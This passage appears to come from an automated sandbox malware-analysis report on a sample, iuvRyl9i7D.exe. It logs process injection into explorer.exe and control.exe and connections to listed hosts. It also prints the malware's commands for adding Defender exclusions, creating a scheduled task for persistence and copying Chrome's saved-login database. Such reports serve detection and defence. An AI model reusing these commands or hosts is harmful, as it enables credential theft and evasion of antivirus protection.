          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_0467FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_0467FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_046237F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_045F8794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_04667794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_04667794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_04667794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_046A2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_046B1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_04600050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_04600050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_0461002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_0461002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_0461002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_0461002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_0461002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_0460A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_0460A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_0460A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_0460A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_04667016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_04667016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_04667016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_045FB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_045FB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_045FB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_045FB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_046B4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_046B4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_0460B8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_0460B8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_045E58EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_0467B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_0467B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_0467B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_0467B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_0467B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_0467B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_045E40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_045E40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_045E40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_046120A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_046120A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_046120A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_046120A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_046120A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_046120A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_046290AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_045E9080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_0461F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_0461F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_0461F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_04663884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_04663884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_0460B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_0460B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_045EB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_045EB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_045EC962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_04604120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_04604120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_04604120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_04604120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_04604120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_0461513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_0461513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_045E9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_045E9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_045E9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_046741E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_045EB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_045EB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_045EB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_046669A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_046161A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_046161A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_046A49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_046A49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_046A49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_046A49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_046651BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_046651BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_046651BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_046651BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_046099BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_046099BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_046099BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_046099BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_046099BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_046099BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_046099BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_046099BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_046099BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_046099BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_046099BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_046099BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_0460C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_0461A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_04612990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_0469B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_0469B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_046B8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_0462927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_045E9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_045E9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_045E9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_045E9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_04674257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_046AEA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_045EAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_045EAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_0460A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_0460A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_0460A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_0460A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_0460A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_0460A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_0460A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_0460A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_0460A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_04624A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_04624A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_045E5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_045E5210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_045E5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_045E5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_045F8A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_04603A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_046AAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_046AAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_04612AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_04612ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_0461FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_045FAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_045FAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_0461D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_0461D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_045E52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_045E52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_045E52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_045E52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_045E52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_045EF358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_04613B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_04613B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_045EDB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_046B8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_045EDB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_0460A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_0460A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_0460A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_0460A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_0460A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_0460A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_0460A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_0460A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_0460A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_0460A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_0460A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_0460A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_0460A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_0460A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_0460A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_0460A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_0460A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_0460A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_0460A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_0460A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_0460A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_046A131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_046103E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_046103E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_046103E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_046103E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_046103E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_046103E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_0460DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_046653CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_046653CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_04614BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_04614BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_04614BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_046B5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_045F1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_045F1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_046A138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_0469D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_0461B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_04612397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\control.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeCode function: 12_2_0040A140 LdrLoadDll,
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Source: C:\Windows\explorer.exeNetwork Connect: 38.34.163.59 80
          Source: C:\Windows\explorer.exeNetwork Connect: 35.209.127.155 80
          Source: C:\Windows\explorer.exeDomain query: www.properscooter.com
          Source: C:\Windows\explorer.exeDomain query: www.jamesreadtanusa.com
          Source: C:\Windows\explorer.exeNetwork Connect: 198.54.116.236 80
          Source: C:\Windows\explorer.exeDomain query: www.uspplongee.com
          Source: C:\Windows\explorer.exeDomain query: www.bldh45.xyz
          Source: C:\Windows\explorer.exeNetwork Connect: 5.183.8.183 80
          Source: C:\Windows\explorer.exeDomain query: www.dems-clicks.com
          Source: C:\Windows\explorer.exeDomain query: www.kickball.site
          Source: C:\Windows\explorer.exeNetwork Connect: 35.241.47.216 80
          Source: C:\Windows\explorer.exeNetwork Connect: 198.54.117.216 80
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeSection unmapped: C:\Windows\SysWOW64\control.exe base address: DF0000
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeSection loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeSection loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\control.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\control.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeMemory written: C:\Users\user\Desktop\iuvRyl9i7D.exe base: 400000 value starts with: 4D5A
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeThread APC queued: target process: C:\Windows\explorer.exe
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeThread register set: target process: 3616
          Source: C:\Windows\SysWOW64\control.exeThread register set: target process: 3616
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\dDqpEdJEtzi.exe
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\dDqpEdJEtzi.exe
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\dDqpEdJEtzi.exe
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dDqpEdJEtzi" /XML "C:\Users\user\AppData\Local\Temp\tmp280F.tmp
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeProcess created: C:\Users\user\Desktop\iuvRyl9i7D.exe C:\Users\user\Desktop\iuvRyl9i7D.exe
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeProcess created: C:\Users\user\Desktop\iuvRyl9i7D.exe C:\Users\user\Desktop\iuvRyl9i7D.exe
          Source: C:\Windows\SysWOW64\control.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
          Source: explorer.exe, 00000012.00000000.306887660.0000000005610000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.299535481.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000012.00000000.345614636.0000000005E60000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000012.00000000.299535481.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000012.00000000.339387652.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.322719517.00000000005C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000012.00000000.299535481.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000012.00000000.373339279.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000012.00000000.323354570.0000000000B50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager,
          Source: explorer.exe, 00000012.00000000.299535481.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000012.00000000.373339279.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000012.00000000.323354570.0000000000B50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Users\user\Desktop\iuvRyl9i7D.exe VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
